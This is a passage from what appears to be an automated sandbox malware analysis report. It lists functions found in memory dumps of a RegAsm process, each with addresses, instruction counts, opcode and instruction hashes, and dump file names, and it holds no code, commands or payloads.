                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e82e9a775dc6849218af280c8eff61af9fde5ad49957330e4194f9e5e1416970
                                                                                                                                    • Instruction ID: ddfef5a0c1a5eef9016a5cafacb9bf0b2ea53fbbbfc291c2da2fcb8a67e3c764
                                                                                                                                    • Opcode Fuzzy Hash: e82e9a775dc6849218af280c8eff61af9fde5ad49957330e4194f9e5e1416970
                                                                                                                                    • Instruction Fuzzy Hash: 12F0C835B492505BDB15A27D5C585BE6E6F8BC1120B0C447BDB0AC7345EFA588068265
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01697110 Relevance: .0, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0bdb6267c40c2ce3e88c2f81e377fa80af7b8aa952d25e86af376c64264be306
                                                                                                                                    • Instruction ID: 1ee04bbc48b284b654a09eb239db62fc4ba85bc53ab675342d64959e7c0bae96
                                                                                                                                    • Opcode Fuzzy Hash: 0bdb6267c40c2ce3e88c2f81e377fa80af7b8aa952d25e86af376c64264be306
                                                                                                                                    • Instruction Fuzzy Hash: 9301A43120534157EB106F59DC91785B3AAFB85324F14837EE909AF7C1CB75584587A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694658 Relevance: .0, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 66bb2ea11466828ec24e97be8aba2d7c17556750caa738b1af740fce7e379e7e
                                                                                                                                    • Instruction ID: d68432c2a0fae70d0743f34ec8cdcd61175a454a2b4b19e0212a91fb72f0e532
                                                                                                                                    • Opcode Fuzzy Hash: 66bb2ea11466828ec24e97be8aba2d7c17556750caa738b1af740fce7e379e7e
                                                                                                                                    • Instruction Fuzzy Hash: A2F0AF31914104CBDF089BA9DD195FEBB7AEB9A201F00542AE605B3250DF3859058BA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685FF60 Relevance: .0, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f7ce0ea22782007d41f9a8e2c993c42c680dc3ba52d62a3f5142a0b6c46ede4c
                                                                                                                                    • Instruction ID: ae1b9f28184c1fdc699404e6684e2b4f9fb446c406755d2a872402ac4aa04543
                                                                                                                                    • Opcode Fuzzy Hash: f7ce0ea22782007d41f9a8e2c993c42c680dc3ba52d62a3f5142a0b6c46ede4c
                                                                                                                                    • Instruction Fuzzy Hash: 15F0C836300315DBD7108A55E48091AF7A6FBC6668B54C569DE0D9B744C632EC07CBD1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685C4A8 Relevance: .0, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 58e4be6f06765ad8d1f54033c01f7f0e1893c086181e095d4cbbb792f0565825
                                                                                                                                    • Instruction ID: 02596e8e716d91f51b22e7dfbe630e028dccd47a2432d8a5843ea53608a7a566
                                                                                                                                    • Opcode Fuzzy Hash: 58e4be6f06765ad8d1f54033c01f7f0e1893c086181e095d4cbbb792f0565825
                                                                                                                                    • Instruction Fuzzy Hash: AB014C342046098FD364AB65D51866AB7E7FBC9315B108A2DD24B8BB54CFB4A80A8B91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06855508 Relevance: .0, Instructions: 42COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8bebdb1eb7ae5eb8b2962bc076d29d5a7896249ac8472564e06a4f03fddbf6e9
                                                                                                                                    • Instruction ID: 261e5d6c15b6af353e46533f549d1e49abddadb80b61d7d1b4d2171cb3f717dc
                                                                                                                                    • Opcode Fuzzy Hash: 8bebdb1eb7ae5eb8b2962bc076d29d5a7896249ac8472564e06a4f03fddbf6e9
                                                                                                                                    • Instruction Fuzzy Hash: EF01F430A01706CFCBA99E39E50062BB3F3BF84209716883CD907C2618DB71E884CB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC4090 Relevance: .0, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d1bfd79688bb1c0ecd17d204233114b280092e89224a1b297706c46cd888f57c
                                                                                                                                    • Instruction ID: 7b94e74eacc75d7429e7649ff4f1a5c041daea6485371b302390eae896ba4c96
                                                                                                                                    • Opcode Fuzzy Hash: d1bfd79688bb1c0ecd17d204233114b280092e89224a1b297706c46cd888f57c
                                                                                                                                    • Instruction Fuzzy Hash: 621135B5800289CFDB20CF8AD485BDEBFF4EB48324F10842DD558A3200C378A584CFA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC20D0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cda47dbeb98aa79db5cf085ec137722bdfaf4788460060a9cc66360834aed024
                                                                                                                                    • Instruction ID: a2c23cf505c937fcad0fc188dd56e3c7e143e3a87e591c6639543d73a460476b
                                                                                                                                    • Opcode Fuzzy Hash: cda47dbeb98aa79db5cf085ec137722bdfaf4788460060a9cc66360834aed024
                                                                                                                                    • Instruction Fuzzy Hash: FD111B74E00209EFCB04EFA4D959A9CBBB1FB89305F2085A9D50597354EB749E45CF40
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553FF40 Relevance: .0, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 95f5fd3eb23ddb6c2d2680e44677621a44a995060448afd6f6355636a94d5e61
                                                                                                                                    • Instruction ID: 88857f1c87f51a071c251a00262b72057af2013db6be182966828b97fb20f622
                                                                                                                                    • Opcode Fuzzy Hash: 95f5fd3eb23ddb6c2d2680e44677621a44a995060448afd6f6355636a94d5e61
                                                                                                                                    • Instruction Fuzzy Hash: EB01F4723046515FC725AB29D9409EEBBABBFC9300705442AF5858B314CFB0ED1287D1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01695C64 Relevance: .0, Instructions: 40COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f59927ab04ef0f71e117ba2cd06e9c902a5ea0b3d0db5901d7a9dcc42443e39a
                                                                                                                                    • Instruction ID: c74147018371f11e5d8d1c39ff18df0850cd28c2aa7a0a56083e998cf27c78c9
                                                                                                                                    • Opcode Fuzzy Hash: f59927ab04ef0f71e117ba2cd06e9c902a5ea0b3d0db5901d7a9dcc42443e39a
                                                                                                                                    • Instruction Fuzzy Hash: 0FF0AF3120520297EB006F6D8CE0799B3AAFF89324F14477EEA09AF385CB75584587A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC5C5A Relevance: .0, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6335108756dacfbf7dca776cce6bac04f7a645c753ea630b24c02d2b3a269871
                                                                                                                                    • Instruction ID: a864d9ba9e2cfc33428fc3dc93e30ca1275526de77c36aa4d0706a8b74504aa9
                                                                                                                                    • Opcode Fuzzy Hash: 6335108756dacfbf7dca776cce6bac04f7a645c753ea630b24c02d2b3a269871
                                                                                                                                    • Instruction Fuzzy Hash: 4EF024B130020AABC310B77CA420A9A7BEAFBC665071044AAD105CB384DEA1DC0A87E2
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169B3C8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f8e423566d4fe423e42c682d6d55d06a0d52ec139d6d3e4b531bf1be4877221c
                                                                                                                                    • Instruction ID: 1133e2f73642a3951948e857c9d6fbae1105aeea6ff44ef3e41e9adf01a47556
                                                                                                                                    • Opcode Fuzzy Hash: f8e423566d4fe423e42c682d6d55d06a0d52ec139d6d3e4b531bf1be4877221c
                                                                                                                                    • Instruction Fuzzy Hash: ACF09030B101049FDB54CE3ED844E6ABBEAEF89610F2480BAE509C7365EA31DC02CB10
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068567C8 Relevance: .0, Instructions: 38COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7bddc727df47db7758abe2d9a165b1494e4ba7044d4373cb141c713299dc2a6c
                                                                                                                                    • Instruction ID: 8b23164f841357483fa1a11b1affad36ffcd75ab1a321a67a3c0fd26b9b8f70b
                                                                                                                                    • Opcode Fuzzy Hash: 7bddc727df47db7758abe2d9a165b1494e4ba7044d4373cb141c713299dc2a6c
                                                                                                                                    • Instruction Fuzzy Hash: C6F0F631B803045FDB2086289C00F697FE59B42715F558265E710CB5F2EBB1E845D740
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169D940 Relevance: .0, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d586bb0f7ae4457eda64f80b4ea21b35424d0ba912fa8160bc345f8c6298446d
                                                                                                                                    • Instruction ID: 6c2a94b37f68018badb42b00a6ea3094ffac65361f28f114b9b8abc4fa98090f
                                                                                                                                    • Opcode Fuzzy Hash: d586bb0f7ae4457eda64f80b4ea21b35424d0ba912fa8160bc345f8c6298446d
                                                                                                                                    • Instruction Fuzzy Hash: 4CF012203496904FCF06E72898646597BAA9F96710F1540EFD049CF7A2C9598C0587A5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06858F50 Relevance: .0, Instructions: 37COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e1319ac01c19a4d82994b09cddb0710d97e25441550269ef03e2e7ae7b731b16
                                                                                                                                    • Instruction ID: 8ff5ecac63fb44b26f1aa2139ddb4f7595a2eb66e6fe95d48b962dec74b735c1
                                                                                                                                    • Opcode Fuzzy Hash: e1319ac01c19a4d82994b09cddb0710d97e25441550269ef03e2e7ae7b731b16
                                                                                                                                    • Instruction Fuzzy Hash: 2A01D2B4D0521AEFCB44DFA9D9456EEBBF1BB48305F1080AAE915E3340EB740A40CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 01694668 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4bbda53cb2ffff044a65609ccbb28bc30782f12edb0ca463b8ce4e91e1572b3b
                                                                                                                                    • Instruction ID: 7a0fff4b1b12734519ae031b8e004b4bb1bcc72ee8436df10e1ac41acdfe90d8
                                                                                                                                    • Opcode Fuzzy Hash: 4bbda53cb2ffff044a65609ccbb28bc30782f12edb0ca463b8ce4e91e1572b3b
                                                                                                                                    • Instruction Fuzzy Hash: 1FF03A30A14209CBDB48EBB9D9195FEBBBAEB8A301F006429E605B3250DF745915CAA5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169CF90 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df310860851c557c4eb51df9435701e4cf8f15dab7a1944ea8c113b12d478645
                                                                                                                                    • Instruction ID: 0cf1712e3c6942daf60e3b7e2258cb37d48198955ecb68a443ed4738555bad97
                                                                                                                                    • Opcode Fuzzy Hash: df310860851c557c4eb51df9435701e4cf8f15dab7a1944ea8c113b12d478645
                                                                                                                                    • Instruction Fuzzy Hash: 14F02431A843051BDB109B2DC800A9EBFADEF81660B004576E000CB344EF66D80A87D5
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685ACB8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dea415935fe6e7054a099a57e43a570748666e0f1f35022b3514ea84b4967567
                                                                                                                                    • Instruction ID: 49a9e9786a753e11ab511e914e96fc55329877d0eb412f450a49bd12e9a65617
                                                                                                                                    • Opcode Fuzzy Hash: dea415935fe6e7054a099a57e43a570748666e0f1f35022b3514ea84b4967567
                                                                                                                                    • Instruction Fuzzy Hash: C3F0527230D2B41FC31727786C584BD3FAAE8C22D134404AFE283CB662DA448906C3E1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685ADE9 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 30fed71e1cd929bd0c5633b0e95d877131e855314f1ecdd2497880bbb5cf039d
                                                                                                                                    • Instruction ID: 4ea8b564fbc9e0f697734aa441226357f0c7ad807b4022c5af24b98f668d363a
                                                                                                                                    • Opcode Fuzzy Hash: 30fed71e1cd929bd0c5633b0e95d877131e855314f1ecdd2497880bbb5cf039d
                                                                                                                                    • Instruction Fuzzy Hash: 06F0E2312051116FC2502669A888FEF7ADEFBC9390F00043CE24B83A42CA60184582A4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 015FDAD8 Relevance: .0, Instructions: 36COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1860467083.00000000015FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015FD000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_15fd000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7e7ad3fdab5d724e246f3519102dd0feb5ff9a543df2ba1b35ffaf0d6603e1d6
                                                                                                                                    • Instruction ID: 25de6ac79bafb3331d09ce4ced38e0be35d35877bfc8d5a5cec098163c0b9d8a
                                                                                                                                    • Opcode Fuzzy Hash: 7e7ad3fdab5d724e246f3519102dd0feb5ff9a543df2ba1b35ffaf0d6603e1d6
                                                                                                                                    • Instruction Fuzzy Hash: E5F06271404344AAE7118E1ADDC4B66FFE8EF81625F18C55EEE085E286C6799844CAB1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553FF50 Relevance: .0, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b324214fbed12b0df18a820bfe5717d8f921db2941e1093021afc23ad88f169b
                                                                                                                                    • Instruction ID: 645ce403ac4583686953bd377517eadc31a139ada0a27fabb47671e83f2864a8
                                                                                                                                    • Opcode Fuzzy Hash: b324214fbed12b0df18a820bfe5717d8f921db2941e1093021afc23ad88f169b
                                                                                                                                    • Instruction Fuzzy Hash: 48F090313046219FCB15AB29D9408AEBBABFFC9204704442AF6568B314CFB4ED11CBD0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169D289 Relevance: .0, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c4f78c87431e86ec7e7bcc77db85adc2a82d305824268f313ad277b060d172e7
                                                                                                                                    • Instruction ID: 437984dc2e723d950b67ee9c4f06bdcd74ad0c13ebdc21b138760516a926b585
                                                                                                                                    • Opcode Fuzzy Hash: c4f78c87431e86ec7e7bcc77db85adc2a82d305824268f313ad277b060d172e7
                                                                                                                                    • Instruction Fuzzy Hash: 81F0623A200559AFCF068F84C804CE93FA7FBC93247098066FA459B265C635D925ABA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06856EA0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4da6aa3e80c2bc8b0cd4fbed1ce0ebb6a4dd5fb06d6c4638fcb0773babd6d69f
                                                                                                                                    • Instruction ID: 79352b1385ab94a68a6dc5c6c3c16034b10659d2eff3c707d2c494be4cfe1a25
                                                                                                                                    • Opcode Fuzzy Hash: 4da6aa3e80c2bc8b0cd4fbed1ce0ebb6a4dd5fb06d6c4638fcb0773babd6d69f
                                                                                                                                    • Instruction Fuzzy Hash: 84F012722041E93F8B519E9A5C10CFB7FEDDACE1627094166FFA8D2152C429CD21EBB0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07AC53E1 Relevance: .0, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6dfdcd685b1a892bd9fabb6c4917d3e60e76fb145fbac033945b4fd744868682
                                                                                                                                    • Instruction ID: f685a325859327ea37f14c36ee4d1c430e3c3e15df764d920e04c93fe8a01e43
                                                                                                                                    • Opcode Fuzzy Hash: 6dfdcd685b1a892bd9fabb6c4917d3e60e76fb145fbac033945b4fd744868682
                                                                                                                                    • Instruction Fuzzy Hash: 3DF0A7F1819760FBC314CF06ED401A3BBFAEB4623AF70416EE15E4B551C531B094C256
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06858341 Relevance: .0, Instructions: 34COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bde2e729bd173069dd69a8a974682380686e50d7c187a66ba1e839b8cf2666af
                                                                                                                                    • Instruction ID: f643265feaf50037ff43b1a95d32bbe8ca63f80d8cc4585e6ba615e3b839e3f4
                                                                                                                                    • Opcode Fuzzy Hash: bde2e729bd173069dd69a8a974682380686e50d7c187a66ba1e839b8cf2666af
                                                                                                                                    • Instruction Fuzzy Hash: B0F0A7B1F101255FCB50CAA9AD485FE7BEAEBC92517094537DE18D3101E73189168761
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553441A Relevance: .0, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b34290de683520c530f111493f4e073da9ae8b84801628809cb5375cbc330fb3
                                                                                                                                    • Instruction ID: aa6245a783fa6de7ae4c44e2245fcbdfec521594a5857523d598ea1dfb2a017b
                                                                                                                                    • Opcode Fuzzy Hash: b34290de683520c530f111493f4e073da9ae8b84801628809cb5375cbc330fb3
                                                                                                                                    • Instruction Fuzzy Hash: 18F06D31640A008FC728EE28E459B1A73E1FB84705B044569D506CB7B0DA38DC46CB80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05532D90 Relevance: .0, Instructions: 33COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
